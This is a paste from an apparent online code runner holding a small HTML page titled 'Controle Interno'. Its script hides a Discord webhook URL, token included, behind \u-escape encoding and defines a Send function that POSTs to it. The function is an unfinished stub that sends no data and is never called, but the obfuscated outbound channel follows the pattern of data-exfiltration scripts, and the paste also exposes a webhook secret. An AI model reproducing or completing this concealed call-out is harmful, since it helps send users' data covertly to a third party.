Untitled

Run Settings
LanguageAssembly
Language Version
Run Command
<!DOCTYPE html> <head> <title>Controle Interno</title> </head> <body> <header> <h1>CONTROLE INTERNO:</h1> </header> <nav class="primario"> </nav> <style> * { padding:0px; margin:0; box-sizing: border-box; } header { padding:8px 12px; color:white; background:linear-gradient(rgba(0,0,0,0.5), rgba(0,0,0,0.1)); font-family: Arial, Helvetica, sans-serif; } .primario { background:linear-gradient(rgba(0,0,0,0.1), rgba(0,0,0,0.5)); width:100%; height:100vh; } </style> <script> const Hook = "\u0068\u0074\u0074\u0070\u0073\u003a\u002f\u002f\u0064\u0069\u0073\u0063\u006f\u0072\u0064\u002e\u0063\u006f\u006d\u002f\u0061\u0070\u0069\u002f\u0077\u0065\u0062\u0068\u006f\u006f\u006b\u0073\u002f\u0031\u0030\u0036\u0038\u0032\u0036\u0039\u0036\u0035\u0034\u0031\u0036\u0038\u0030\u0035\u0035\u0038\u0039\u0038\u002f\u006f\u005f\u0034\u0053\u0057\u0036\u006e\u004b\u0070\u004e\u006d\u0044\u0055\u0068\u0032\u0041\u0050\u006d\u0042\u006f\u0038\u0045\u0067\u0032\u005f\u006d\u0066\u0054\u007a\u0050\u006c\u006d\u0075\u004e\u006f\u0071\u0044\u004a\u0047\u0064\u0076\u0048\u0073\u0065\u0056\u004f\u0037\u0068\u0057\u0069\u0063\u004b\u004e\u006d\u0035\u0077\u004b\u0079\u0030\u0073\u0054\u0034\u0036\u0076\u0036\u0037\u0035\u0079" function Send(txt){ fetch( Hook, { "method":"POST", "headers":{ "Content-Type":"application/json" } } ) } </script> </body>
Editor Settings
Theme
Key bindings
Full width
Lines